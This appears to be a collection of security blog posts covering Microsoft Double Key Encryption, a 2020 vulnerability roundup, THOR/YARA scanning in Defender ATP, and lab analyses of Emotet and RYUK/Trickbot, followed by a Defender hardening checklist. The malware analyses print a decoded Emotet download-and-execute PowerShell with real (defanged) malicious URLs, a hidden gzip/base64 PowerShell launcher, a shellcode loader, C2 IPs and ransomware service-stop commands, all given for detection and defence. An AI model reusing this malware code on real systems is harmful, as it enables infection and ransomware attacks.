Today Microsoft announced the public preview of Double Key Encryption (DKE).

What does “Double Key” mean? It’s similar to a missile launch where two people must turn their key at the same time. In the case of encryption, it is the combination of two keys held by separate parties that encrypt or decrypt data.

Or to quote Microsoft:

“Double Key Encryption enables you to protect your highly sensitive data while keeping full control of your encryption key. It uses two keys to protect your data—one key in your control, and a second key is stored securely in Microsoft Azure. Viewing data protected with Double Key Encryption requires access to both keys. Since Microsoft can access only one of these keys, your protected data remains inaccessible to Microsoft, ensuring that you have full control over its privacy and security.”

Your Client Key is hosted outside of Microsoft (wherever you want) via a web service that you are responsible for hosting. If your web service goes down (intentionally or unintentionally) then no new data can be encrypted or decrypted.

This is similar to its predecessor, Hold-Your-Own-Key (HYOK) which I assume DKE will eventually replace at some point in the future. Except there is one big advantage: Unlike HYOK, DKE does not depend upon on-premises Active Directory Rights Management Services (AD RMS). So it is a simpler configuration.

Is DKE right for me? Most likely not. It’s intended for some super rare scenarios that very few clients have. There are serious productivity limitations to DKE that are nearly identical to HYOK, where many features inside Office 365 and other services will not function such as SharePoint Search, eDiscovery Search, Data Loss Prevention, Transport Rules, Exchange ActiveSync, Journaling, Malware scanning, Archiving Solutions and any other services that needs to read data such as 3rd party document management systems.

Therefore customers should carefully evaluate all key options before proceeding with DKE (see table below).

What if I lose my key? Your data is inaccessible, and there is no ‘back door’ key like the ‘Availability Key’ feature in BYOK that allows Microsoft to decrypt data if you lose your BYOK key.

Encryption Key Comparison

Office Insider is required at the time of this writing (July 2020) but eventually it will roll out to Office versions in mainstream support.

Initially at the time of this writing, the AIP Unified Labeling Client is required to encrypt/decrypt content. It will eventually be available natively in the Office Ribbon.

Additional Resources

Blog Post: https://aka.ms/DKEpreview
Deployment Docs: https://aka.ms/DKEpreviewdocs
Github Repo: https://aka.ms/DKErepo
Update [10/22/2020] Host DKE on IIS, using an on-premises server – Microsoft Tech Community

Palo Alto CVE-2020-2021

If you have SAML enabled on your Palo Alto, a CVE Severity 10 Critical vulnerability allows remote unauthenticated access
https://security.paloaltonetworks.com/CVE-2020-2021

Citrix (Multiple CVE’s)

Multiple vulnerabilities in the Citrix Application Delivery Controller (ADC) and Gateway would allow code injection, information disclosure and denial of service, the networking vendor announced Tuesday. Four of the bugs are exploitable by an unauthenticated, remote attacker.

https://threatpost.com/citrix-bugs-allow-unauthenticated-code-injection-data-theft/157214/

F5 (CVE-2020-5902)

If you have F5, and haven’t patched, treat it as incident response at this point as public exploits are available. There was also a new bypass discovered.

Chrome

Google is rolling out an important software update for Chrome browser—version 83.0.4103.106 for Windows, Mac, and Linux—that includes security patches for 4 high-severity vulnerabilities.

SAP (CVE-2020-6287)

A new critical vulnerability, carrying a severity score of 10 out of 10 on the CvSS bug-severity scale, was found in SAP impacting 40,000 customers. At least 2,500 customers in the United States that have internet facing SAP are impacted.

According to an alert from the Department of Homeland Security, successful exploitation of the bug opens the door for attackers to read and modify financial records; change banking details; read personal identifiable information (PII); administer purchasing processes; sabotage or disrupt operations; achieve operating system command execution; and delete or modify traces, logs and other files.
https://threatpost.com/critical-sap-bug-enterprise-system-takeover/157392/

Cisco CVE-2020-3297

The flaw ranks 8.1 out of 10.0 and could allow remote, unauthenticated attackers to access the switches’ management interfaces with administrative privileges.

https://threatpost.com/cisco-warns-high-severity-bug-small-business-switch/157090/

Microsoft

AVANAN announced “SYLKin Attack” which claims to bypass M365 security.

You can block .SLK attachments with the Set-MalwareFilterPolicy PowerShell command, or Exchange transport rules.

Patch Tuesday (7/14/2020) included a fix for a wormable RCE vulnerability in Windows DNS that should be patched ASAP. (CVE-2020-1350)

Microsoft pushed out two emergency security updates to fix remote code execution bugs in Microsoft Windows Codecs Library.

These patches come weeks after Microsoft’s regularly scheduled June Patch Tuesday, where it released patches for 129 vulnerabilities – the highest number of CVEs ever released by Microsoft in a single month. Within the blockbuster security update, 11 critical remote code-execution flaws were patched in Windows, SharePoint server, Windows Shell, VBScript and other products. Unlike other recent monthly updates from Microsoft, its June updates did not include any zero-day vulnerabilities being actively attacked in the wild.

Got Mac OSX? Are they enrolled into Intune? If so, then deploying Microsoft Defender ATP (MDATP) to these devices is done in 7 easy clicks.

Start off by browsing to Microsoft Endpoint Manager at https://endpoint.microsoft.com

Yes, that was easy, however, the fine print is you first must deploy a kernel extension profile *BEFORE* the 7 steps above, otherwise the user will see “System extension blocked.”

If for some reason you missed that step, users must approve the extension manually by going to Security Preferences > Security & Privacy on the Mac and select Allow.

Other helpful scripts and tips are available on the Microsoft blog (here).

Microsoft Defender Advanced Threat Protection (MDATP) is an extended detection and response (XDR) solution, a kind of SHIELD, that combines protection for endpoints (Microsoft Defender ATP), email and productivity tools (Office 365 ATP), identity (Azure ATP), and cloud applications (Microsoft Cloud App Security/MCAS), and many 3rd party solutions like Nextron Systems THOR APT Scanner. As customers face attacks across endpoints, cloud, applications and identities, MTP looks across these domains to understand the entire chain of events, identifies affected assets, like users, endpoints, mailboxes, and applications, and auto-heals them back to a safe state.

Basically, it’s very similar to how S.H.I.E.L.D needs the Avengers to carry out missions. Do you see what I did there? (Thor is an Avenger).

This blog post is about the 3rd party aspect of the XDR when MDATP can tap into THOR to use 12,000 YARA rules from Nextron Systems.

How do you get your hands on YARA rules? Well, you can write your own, but that could take you years to map out all the known threats out there. Or you can purchase a tool like THOR from Nextron Systems, which integrates with their database of 12,000+ YARA rules. The strength of their particular rule set is that it focuses detecting APT threat groups, and over 1,500 web shells. Most EDR systems miss the web shells that these YARA rules detect.

Nextron has previously published their integration capabilities with MDATP on their blog (here) and I highly recommend you check it out.

In this blog post, we are going to try out the newest integration from Nextron, which features their THOR Cloud scanner. This was EASY! From start to finish it took me less than 5 minutes. You simply download the PowerShell script from Nextron, which is generated to include the license key, upload that script into MDATP’s Live Response, and in less than one minute, get a report back on any matches that were found from the THOR scan. The default configuration, quick scan, can be modified to include additional modules such as Registry and Process, but this will increase the scan time from 1 minute to ~15 to 20 minutes. A scan of the entire file system and event log could extend the time to 40 minutes to 3 hours depending on the number of files and types of contents. I recommend getting started with quick scan first so you can see how it works. If you decide to make changes, here is a screen shot of the section of the script you can change:

Step 1. Obtain a license key from Nextron.

Note: This blog post will be updated with more details about an upcoming webinar in June, 2020 featuring Florian Roth (@cyb3rops)

Step 2. Launch MDATP Live Response Session

Note: As of April 6th, Live Response now runs on Windows 10 1709 or newer (it was previously only available on 1903 or newer). Make sure you have Live Response and Custom Scripts enabled in MDATP (they are off by default). You’ll need to enable, at least, the minimum Remediation Level for a given Machine Group.

Upload the thor-seed.ps1 file that you obtained from Nextron.

The scan completed in just under one minute. Very fast, when you consider it used over 12,293 YARA rules!

It produced a handsome HTML report in C:\ProgramData\thor

I first ran this on a clean system to create a baseline, I wanted to make sure I didn’t get too many false positives on a machine I expected to be clean. It was very accurate, because it detected TOR but no other false indicators.

On another system I tried, it reported a file containing dumped password hashes, created from Gsecdump (developed by Johannes Gumbel).

Here is an example of PSEXEC.exe being found even though it was renamed to 2.exe

After the scan completes, it provides hints on the syntax to remotely retrieve the HTML report and detailed TXT files from the remote system, and then remove them with the remediate command.

If you run the scan twice, you need to first remove the prior HTML and TXT files. If you use the Remediate command, it will create a pop-up on the target machine that the file was removed.

Another interesting lesson I learned is that even if you delete the HTML report, if you download it a second time, Defender will still grab a cached copy from the first download

I believe adding the timestamp to the file name should eliminate this cache problem.

Overall, I would highly recommend this whenever you are investigating a threat with MDATP because many of these YARA rules detect threats that are not yet found in VirusTotal. These YARA rules from Nextron effectively extend the MDATP detection capabilities as shown below. For example, the presence of TOR.exe, PSEXEC.exe, or the LM Hash dump from Gsecdump were not flagged as alerts inside MDATP EDR.

Also, check out the latest MITRE evaluation of MDATP against the Russian Hacking Group “Fuzzy Bear” aka APT 29 (here).

For Chrome to be compatible with Azure AD conditional access security policies that check for Hybrid Domain Join, you must install a Browser extension from (here) *or* deploy a registry key from (here).

This is because Chrome does not pass the Hybrid Domain Join status, as shown below:

Adding the browser extension or registry keys allows a user to use Chrome to access the SSO via conditional access policy.

Otherwise you will get an error “You can’t get there from here”

This blog post is an informal analysis of Emotet and how Microsoft security solutions detect it.

Disclaimer: Do not try this on your own unless you know what you are doing (even if you know what you are doing – I accept no responsibility for your actions – this is an educational blog post meant to educate on the dangers of Emotet and what defenses are effective at blocking it!).

Lab Setup:

Machine 1 = Microsoft Windows 10 1809 with the standard free built-in Defender antivirus.

Machine 2 = Microsoft Windows 10 1809 with the Microsoft Defender Advanced Threat Protection (MDATP)

Machine 1 (Free Windows Antivirus)

Smart Screen immediately detected the website hosting Emotet:

After ignoring the warning, I got another warning when trying to download the file.

I had to go into the downloads and choose “download file anyway.”

Finally, I was able to save it to the desktop and launch it on Machine 1.

Inside the document, a message tells the user to Enable Editing and Enable content…

After clicking Enable Content, I am asked to translate this document – or “Never for Russian.” HA! That should be a warning enough!

Sample 1	Sample 2	Sample 3
Sample 4	Sample 5	Sample 6
	anytvvyj37x.exe	Y19kqh1qzpi.exe

Before proceeding further, let’s look at what the Macro would do. Intense obfuscation going in in this code, with the word Process being truncated:

It’s clear from analyzing this that the first recommendation is to disable Macros from running from Office documents. These obfuscation techniques would be very difficult to block. Download a copy of the Macro for analysis (here).

After clicking Enable Editing we get yet another warning. Only the most sadistic user would have clicked past this many warnings without stopping to ask their IT Dept for help, right?

A PowerShell appeared and then disappeared.

Suddenly a file “305.exe” appears in the %userprofile% directory

Finally, a few minutes later, we get a pop-up that Emotet!MTB is found:

Machine 2

As soon as I copied the file to Machine 2, Microsoft MDATP immediately detected and blocked the threat.

Within a few seconds the file was quarantined and removed.

Therefore, to observe what happens within MDATP, I disabled real-time protection.

Here are some observations of what MDATP detected using its Endpoint Detection and Response (EDR) capabilities:

Launching one of the Word documents:

1. wmiprvse.exe -secured -Embedding Powershell -w hidden -en (base-64 encoded command)

   This encoded command was decoded as follows:
   $Jbjdmrkf=’Wvxojjxy’;$Kqzvqjcdbdk = ‘306’;$Gxduocdjcjt=’Bkfkbofippczt’;$Mbkmoong=$env:userprofile+’\’+$Kqzvqjcdbdk+’.exe’;$Uefczpcdfixo=’Rqdkzmydmwtwf’;$Iybnpytfapm=&(‘new’+’-ob’+’jec’+’t’) neT.webcLIEnt;$Dqsynahyyvxl=‘https://sandiegohomevalues%5BDOT%5Dcom/engl/4de-kzsyhu-768611/*https://www.wenkawang[DOT]com/data/bofze0s-7ji4-15/*https://http://www.bruidsfotograaf-utrecht[DOT]com/wp-includes/QLvFLy/*http://ma.jopedu%5BDOT%5Dcom/img/8z8dl-3xn-655019278/*http://pay.jopedu%5BDOT%5Dcom/ThinkPHP/l9okcguh6-b9nnrh7-96245524/’.”S`PLIT”(‘*’);$Avvhkoyer=’Zgzbdzymy’;foreach($Rcrndqfmfme in $Dqsynahyyvxl){try{$Iybnpytfapm.”dO`WnloaDf`Ile”($Rcrndqfmfme, $Mbkmoong);$Ptiuqrijdklve=’Hwhsmlzs’;If ((&(‘G’+’et-Item’) $Mbkmoong).”Len`gTh” -ge 30309) {[Diagnostics.Process]::”s`TarT”($Mbkmoong);$Lstxssia=’Ypyhvhhw’;break;$Vnasbffmoq=’Cmgqpgssndib’}}catch{}}$Ilrervzhi=’Bvnmvmpadnlb’

2. MDATP then observed the creation of a file 306.exe.
   Note: Since this incremented from the last time (305.exe observed earlier, we assume this variant has been run at least 300 prior times).
   
3. Pretty nice how MDATP interfaces decodes the PowerShell on the fly:
   

Launching file: “y19kqh1qzpi.exe”

1. Created file: C:\ProgramData\cvxgdfade.sxcase
   
2. Emotet grabbed the clipboard data

1. A service was created for persistence:
   HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\plainsetthe
   The description it gave itself for evasion was “Windows infrastructure service that controls which background tasks can run on the system.”
   But it is really running this executable:

   “C:\windows\SysWOW64\plainsetthe.exe”

2. Attempted to communicate with IPs:
   154.120.227.206:8080
   190.217.1.149:80
3. MDATP EDR detected plainsetthe.exe as Trojan:Win32/Tiggre!plock by Antivirus
4. MDATP EDR detected cvxgdfade.sxcase as Trojan:Win32/Emotet.PI!MTB by Antivirus
5. svchost.exe -k wsappx -p -s ClipSVC
6. “backgroundTaskHost.exe” -ServerName:App.AppXemn3t55segp7q92mwd35v2a5rk5mvwyz.mca

Summary

The native Windows Defender AV did a good job, but it was especially effective when combined with Microsoft Edge SmartScreen. Based on this experience, I would recommend standardizing on browsers that use SmartScreen.

The advanced MDATP upgrade provided incredible visibility and insight into exactly what was happening to the file system, registry, processes, and network communication. See my previous blog post on MDATP best practices to lock it down even further.

If you are running Office 365 ProPlus Click-To-Run, it would be a good idea to disable Macros at the website config.office.com (Many people don’t realize that Office 365 ProPlus will download configuration from the config.office.com website every time an Office application launches). As an IT Admin, you can create policy to prevent Macros from the internet from launching on PC’s as an extra safeguard.

Another new feature, Safe Docs, is an Office 365 E5 feature that uses ATP SafeAttachments sandboxing to sandbox any Office document – which is helpful because in these cases the malicious documents were downloaded from internet websites.

Here is the MITRE Attack visualizing Emotet + Trickbot + Ransomware

Download TripleThreat MITRE JSON then upload it into Attack Navigator to create your own visualizations.

IOCs

[Raw Analysis can be downloaded to .CSV here]

• 154.120.227.206:8080
  190.217.1.149:80
• cvxgdfade.sxcase
• plainsetthe.exe
• 305.exe (Incremented to 306.exe on the next run)
• HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\plainsetthe
• y19kqh1qzpi.exe
• ‘https://sandiegohomevalues%5BDOT%5Dcom/engl/4de-kzsyhu-768611/*
• https://www.wenkawang%5BDOT%5Dcom/data/bofze0s-7ji4-15/*
• https://www.bruidsfotograaf-utrecht%5BDOT%5Dcom/wp-includes/QLvFLy/*
• http://ma.jopedu[DOT]com/img/8z8dl-3xn-655019278/*
• http://pay.jopedu[DOT]com/ThinkPHP/l9okcguh6-b9nnrh7-96245524/

This blog post is an informal analysis of RYUK ransomware (MITRE T1486) and Trickbot. There have already been many professional write-ups on RYUK, including FireEye, CrowdStrike, Malwarebytes, Cyberreason, and CheckPoint. In the last 90 days, RYUK has been detected in 14 States across the USA and has been labeled the “Threat of the Quarter” by Center of Internet Security. Internationally, the Mexican state-owned petroleum company Pemex was recently infected by RYUK, along with businesses in Spain and around the world. Just do a search for RYUK in the news for the last 30 days and you’ll find dozens of victims including 110 nursing homes, 400 hospitals, several state and local government – it’s a major crisis.

Many of the organizations that have been hit with RYUK did not ‘threat model’ against APT groups, and it’s a rather unfair fight – like an NFL team beating up on your local high school football team, or a military using laser weapons against a civilian population using pitch forks. According to Coveware, the average RYUK ransom payment is $300,000 USD, and RYUK has earned an estimated 4 million dollars in the last 90 days.

I obtained a copy of RYUK from an infected customer and then used the MDATP Evaluation Lab to examine RYUK behavior. I also obtained a copy of Trickbot for analysis from this website (here).

It was helpful to detonate these two samples separately because it can be confusing to know when one starts and the other ends.

The MDATP evaluation lab recorded every process, registry change, file creation and network communication. I’ve uploaded the reports for download here:

• Download RYUK_MDATPAnalysis.csv file (here)
• Download Trickbot_MDATPAnalysis.csv file (here)

My first impression was – this is incredibly complicated. To understand RYUK, you really need a deep understanding of Trickbot (There are two great posts analyzing the behavior (here) and (here). This is because, in the wild, RYUK uses a dropper such as Trickbot or Emotet to disable AV, maintain persistence, steal Chrome & IE Passwords, distribute Ryuk ransomware executable files via Group Policy, and PSEXEC. RYUK by itself is immediately detected by Defender Antivirus as TrojanDropper:PowerShell/Ploty.H and Trojan:Win32/Tiggre!plock which is why it relies upon something like Trickbot or Emotet to disable AV. Crowdstrike reported (here) earlier this month that RYUK has evolved to send wake-on-lan packets to wake up computers that have been shut down.

Trickbot infections can remain undetected for weeks or months until the attackers determine whether or not the victim is worthwhile pursuing according to reporting by Ars Technica. In some cases, the deployment of RYUK is just a diversion to draw attention away from banking/SWIFT transaction fraud.

Trickbot’s initial infiltration uses phishing attachments (like Microsoft Word and Excel) and RDP. Cyberreason observed that Emotet can bring Trickbot into an environment, which can then bring RYUK in.

Trickbot modified the Registry to disable Antivirus. Distribution occurred via PSEXEC and Group Policy Startup, Login, Logoff, and Shutdown scripts. RYUK spread via Group Policy in the attacks against the State of Louisiana as reported by Ars Technica (here), and is therefore similar to how BitPaymer is known to spread via group policy.

Azure ATP detected three lateral movement techniques: Pass-the-ticket, RDP, and SMB file copies to domain controller shares.

There were 5 days between the first Pass-the-ticket to the coordinated distribution of ransomware via Group Policy.

A limited number of target machines performed C2 communication to a single IP address: 160.20.147.91. I suspect this was Trickbot C&C because when RYUK was isolated in a VM by itself, it performed encryption without any external C2 communication. A new Trickbot C&C command “yvjlQIh.exe 8 LAN” was observed (The executable is always random). Other C&C commands have been documented by Fortinet here.

Interesting cleanup command was observed:

rundll32.exe C:\WINDOWS\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:411042507 WinX:0 WinY:0 IEFrame:0000000000000000

PowerShell was encapsulated by Base64 then compressed with GZIP. This GZIP encapsulation ended up being a great way to identify the suspicious PowerShell.

Here is an example:

cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c “if([IntPtr]::Size -eq 4){$b=’powershell.exe’}else{$b=$env:windir+’\syswow64\WindowsPowerShell\v1.0\powershell.exe’};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=’-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(”a string containing commands”))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))’;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=’Hidden’;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);”

Note: The same command above was embedded as a Windows Service here:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\(Random Value)\ImagePath\

To collect a list of all PowerShell commands using GZIP, the following MDATP Advanced Hunting Query can be used (this sample was submitted to the MDATP GitHub Library here).

    ProcessCreationEvents

    | where EventTime > ago(30d)

    | where ProcessCommandLine has “System.IO.Compression.GzipStream”

    | project EventTime, ComputerName, InitiatingProcessFileName, FileName, ProcessCommandLine, MachineId, ReportId

To decompile the GZIP I modified Marcus Gelderman’s PowerShell Script from GitHub (here) to include an additional step to decode Base64.

$import
=
import-csv
gzip-evidence.csv

foreach ($payload
in
$import)

{

$b=[System.Convert]::FromBase64String($payload.Payload)

$decompressedByteArray
=
Get-DecompressedByteArray
-byteArray
$b

Write-Host
“Decoded: “ ( $enc.GetString( $decompressedByteArray ) |
Out-String )>>
output.txt

}

Here is an example of the decoded PowerShell command. Notice each function and parameter is randomized to evade EDR and ML solutions looking for static function strings. However, when I saved this as a TXT file, MDATP instantly recognized it as unsafe and removed the file.

function zQ8wa {

    Param ($al, $ppXta)        

    $qgFCK = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(‘\\’)[-1].Equals(‘System.dll’) }).GetType(‘Microsoft.Win32.UnsafeNativeMethods’)

    return $qgFCK.GetMethod(‘GetProcAddress’, [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($qgFCK.GetMethod(‘GetModuleHandle’)).Invoke($null, @($al)))), $ppXta))

}

function cFG {

    Param (

        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $gM,

        [Parameter(Position = 1)] [Type] $a40 = [Void]

    )

    $zGRY = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName(‘ReflectedDelegate’)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(‘InMemoryModule’, $false).DefineType(‘MyDelegateType’, ‘Class, Public, Sealed, AnsiClass, AutoClass’, [System.MulticastDelegate])

    $zGRY.DefineConstructor(‘RTSpecialName, HideBySig, Public’, [System.Reflection.CallingConventions]::Standard, $gM).SetImplementationFlags(‘Runtime, Managed’)

    $zGRY.DefineMethod(‘Invoke’, ‘Public, HideBySig, NewSlot, Virtual’, $a40, $gM).SetImplementationFlags(‘Runtime, Managed’)

    return $zGRY.CreateType()

}

[Byte[]]$eakcC = [System.Convert]::FromBase64String(“(removed to not uniquely identify client)”)

$cDahn = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((zQ8wa kernel32.dll VirtualAlloc), (cFG @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $eakcC.Length,0x3000, 0x40)

[System.Runtime.InteropServices.Marshal]::Copy($eakcC, 0, $cDahn, $eakcC.length)

$oez = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((zQ8wa kernel32.dll CreateThread), (cFG @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$cDahn,[IntPtr]::Zero,0,[IntPtr]::Zero)

[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((zQ8wa kernel32.dll WaitForSingleObject), (cFG @([IntPtr], [Int32]))).Invoke($oez,0xffffffff) | Out-Null

When isolated by itself, RYUK executed the following commands in the MDATP evaluation lab:

“net.exe” stop “vmickvpexchange” /y
conhost.exe 0xffffffff -ForceV1
net1 stop “vmickvpexchange” /y
“net.exe” stop “sacsvr” /y
net1 stop “sacsvr” /y
“net.exe” stop “samss” /y
net1 stop “samss” /y

About a minute after running RYUK, the ransom page was shown:

Mitigations

For customers who use Microsoft Defender, they can enable the new Anti-Tampering feature to prevent AV from being disabled. Corporate customers can use Intune to make it even harder to disable the Anti-Tampering feature, since it abstracts the ability to turn it off to a separate cloud based management interface (otherwise if the on-premises domain admin is compromised, Anti-Tampering would (Requirements: Windows 10 E5 license, Intune, and Windows 10 1903 or higher).

Microsoft Attack Surface Reduction rules would prevent PSEXEC from launching.

If you are a Microsoft shop, see my other blog article (here) on MDATP best practices for other recommendations.

Attribution

RYUK has historically been attributed to Lazarus Group, or as FireEye suggests, a dedicated unit APT38 but it could have been shared with a cybercrime group in Russia since the update from June 2019 blacklists the ransomware from infecting Russia. McAfee and CrowdStrike have both indicated possible Russian connections because of this black list. Researchers are sharply divided on attribution, but it is worth noting that reports have previously circulated about APT38 inserting Russian language into code as a false flag. Either way, it’s commonly accepted that nation-states and major cybercrime threat actors have access to RYUK. Some have speculated that RYUK may be sold as ransomware-as-a-service on the Dark Web but I haven’t seen much evidence supporting this.

The United Nations Security Council report states that North Korea is illegally generating revenue through cyberattacks to circumvent UN resolutions (page 52).

Insurance Considerations

For businesses that do not have cybersecurity insurance, check with your insurance company if “Business Interruption Insurance” will cover the ransomware attack since the servers are down and therefore interrupting business.

IOCs

• V1.exe
• V2.exe
• 160.20.147.91
• RyukReadMe.html
• PSEXESVC.exe
• HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware\1
• HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSEXESVC
• HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\(Random Value)\ImagePath\
• (Many others – check the
  
  RYUK_MDATPAnalysis.csv and Trickbot_MDATPAnalysis.csv files for more)

   

Hash MD5

    9baf7ea6d780bf8f45db0a3ce23cc3d5

d898182c48a80cf43c4d730d07f12713

Hash SHA1

    89f7dad23e4dd64e80894d4448aa796b8c11f2bc

58713f34eef264d067c6bc694ab7e1b63a260be8

17027688118a848129388a03904f98227e93d100 (as of 11/26/19 still not in Virus Total)

Hash SHA256

3abec9fd1183e0c97992414f342b787236125064f9934df5a1d68d4d6c148870

d22cad2d94b9a39c8b51c88a6d3f6dd9ce6f85ee7915e89daa657b16cb26f70b

• Enable Tamper Protection
  • Why? The first step in many APT attacks is to use a ‘Dropper’ to disable Antivirus or other security settings via the registry, PowerShell, GPO, etc.
  • This is a Microsoft Defender feature that does not require Windows 10 E5, but if you have E5 then you can leverage Intune to prevent the user from disabling this feature. The benefit of requiring Intune is that it abstracts the ability to disable antivirus to a separate management stack. Otherwise the attacker could use several methods of disabling AV. This advanced feature requires Windows 1903 or higher.
  • This can be enabled in two ways:
    • 1) Globally inside Defender for Endpoint’s advanced feature settings (here). You can also enable Troubleshooting Mode (see docs here) if you need to temporarily disable AV on some devices.
      OR
    • 2) Inside Endpoint Manager (aka Intune, at https://endpoint.microsoft.com). This was previously the only way to control Tamper Protection on a per device/group basis. However, now that option #1 above includes troubleshooting mode, the only reason you would use option 2 is if you had devices you never wanted Tamper protection enabled on (why would you do that anyway?!).
      • a) Using Endpoint Security > Antivirus > Windows Security Experience > TamperProtection (Device)
        OR
      • b) Using Intune Device Profiles:
        • Create a profile that includes the following settings:
        • Platform: Windows 10 and later
        • ProfileType: Endpoint protection
        • Settings > Windows Defender Security Center > Tamper Protection
          
• Enable Attack Surface Reduction Rules (ASR)
  • ASR Rules are a feature of Windows 10 E3 and Windows 10 E5. The E5 version adds unique rules that are not available in the E3 version.
  • ASR rules can be enabled without MDE, but the benefit of using MDE is the centralized reporting, otherwise the audits would be decentralized in the local event viewer.
  • ASR Rules are branded as part of “Microsoft Defender Exploit Guard” which is a series of Windows 10 security features including Controlled Folder Access, Exploit Protection, and Network Protection.
  • Some of the ASR rules require cloud-delivered protection to be enabled. Read the ASR documentation page to identify important caveats before enabling ASR.
  • The ASR Rule “Executables that don’t meet a prevalence, age, or trusted list criteria” examines .exe, .dll, .scr to determine if they are in an allow-list that MSFT maintains.
  • In General, all rules should be enabled in Audit mode for 30 days so that you can assess the impact before turning them on in production, and then exclude files/paths that are not compatible.
  • ASR rules can be configured using: Microsoft Endpoint Manager (MEM), PowerShell, Group Policy, Microsoft System Center Configuration Manager (SCCM), and MEM OMA-URI.
  • The Microsoft Blog series “Demystifying ASR rules” is a great read.
  • In Endpoint Manager/Intune, you can enable it in either of two ways
    • Option 1) Endpoint Security > Attack surface reduction. Choose an existing ASR rule or create a new one.
    • Option 2) Device configuration – Profiles > Profile name > Endpoint Protection > Microsoft Defender Exploit Guard > Attack Surface Reduction.
• Enable “Block at First Sight”
  • This is a series of configuration items that submit a new executable or script to cloud. Block at first sight only uses the cloud protection backend for executable files and non-portable executable files that are downloaded from the Internet, or that originate from the Internet zone
  • You can configure this using Intune, SCCM, or Group Policy.
  • In Endpoint Manager/Intune, you can enable it in either of two ways
    • Option 1) Endpoint Security > Antivirus. Choose an existing Policy targeting the Windows 10/11/Server Platform and the profile for Microsoft Defender Antivirus or create a new one.
      • Allow Cloud Protection : Enable
      • Cloud Block Level: High
      • Cloud Extended Timeout: 50 seconds
    • Option 2) Device configuration – Profiles > Profile name > Device restrictions > Windows Defender Antivirus.
      • Cloud-delivered protection: Enable
      • File Blocking Level: High
      • Time extension for file scanning by the cloud: 50
      • Prompt users before sample submission: Send all data without prompting
      • Submit samples consent: Send all samples automatically
• Enable MDE Sample sharing for all files
  • In Endpoint Manager/Intune, you can enable it in either of two ways
    • Option 1) Endpoint Security > Endpoint detection and response. Choose an existing policy or create a new one.
    • Option 2) Device configuration – Profiles > Profile name > Microsoft Defender ATP (Windows 10) > Sample sharing for all files > Enable
      AND
    • Device configuration – Profiles > Profile name > Microsoft Defender ATP (Windows 10) > Expedite telemetry reporting frequency > Enable
• Enable Automatic Investigation and Remediation
  • Create a Role Group in MDE Settings > Permissions > Roles (select a group)
  • Create a MDE machine group, set it to all machines, and assign it to Full – Remediate threats automatically
  • Enable Automated Investigation in MDE Settings > Advanced Features
  • Enable *all* of the MDE Settings > Advanced Features (or as many as you are licensed for, ex: MDI, Intune, MD4CA, etc).
• Block Manual Intune Unenrollment
  • In Intune, navigate to Device configuration – Profiles > Profile name > Device Restrictions > General > Manual unenrollment > Block
  • In Intune, navigate to Device configuration – Profiles > Profile name > Device Restrictions > General > Direct Memory Access > Enabled
• Enable Network Protection
  • Network protection expands the scope of Windows Defender SmartScreen to block all outbound HTTP(s) traffic that attempts to connect to low-reputation sources (based on the domain or hostname).
  • Network Protection is branded as part of “Microsoft Defender Exploit Guard” which is a series of Windows 10 security features including Controlled Folder Access, Exploit Protection, and ASR rules.
  • Network Protection can be enabled without MDE, but the benefit of using MDE is the centralized reporting, otherwise the audits would be decentralized in the local event viewer.
  • In Intune, navigate to Device configuration – Profiles > Profile name > Endpoint Protection > Microsoft Defender Exploit Guard > Network Filtering > Network Protection
• Enable SmartScreen
  • Already Built-in to Microsoft Edge (and Chromium-Edge)
  • “Windows Defender Browser Protection” is available as an add-in to Chrome (here)
  • You can prevent users from disabling SmartScreen using Endpoint Manager
    Before doing this, have a phased rollout starting with a test group and then a broader pilot group for at least 90 days before going into production.
    • Endpoint Security > Attack Surface Reduction > Create Policy > Application Control
      • Leave App locker application control unconfigured (unless you know what you are doing)
      • Block users from ignoring SmartScreen Warnings: Yes
      • Turn on Windows SmartScreen: Yes
• Enable EDR Block Mode.
  • Originally, it was assumed this feature was only applicable when Defender was in passive mode behind another AV client. While that is the primary use case for EDR Block mode, Microsoft’s documentation recommends enabling this feature even when Defender is in Active mode.
    “We recommend keeping EDR in block mode on, whether Microsoft Defender Antivirus is running in passive mode or in active mode. EDR in block mode provides another layer of defense with Microsoft Defender for Endpoint. It allows Defender for Endpoint to take actions based on post-breach behavioral EDR detections.”
• Block Macros (config.office.com)
  • You can configure macro security centrally through config.office.com or through Endpoint Manager > Apps > Policies for Office apps here: https://endpoint.microsoft.com/#blade/Microsoft_Intune_DeviceSettings/AppsMenu/officeProPlusPolicies
  • Disable Trust Bar Notification for unsigned application add-ins and block them
  • Disable all Trust Bar notifications for security issues
  • VBA Macro Notification Settings: Enable with “Disable without Notification”
  • Disable VBA for Office applications
  • Block macros from running in Office files from the Internet
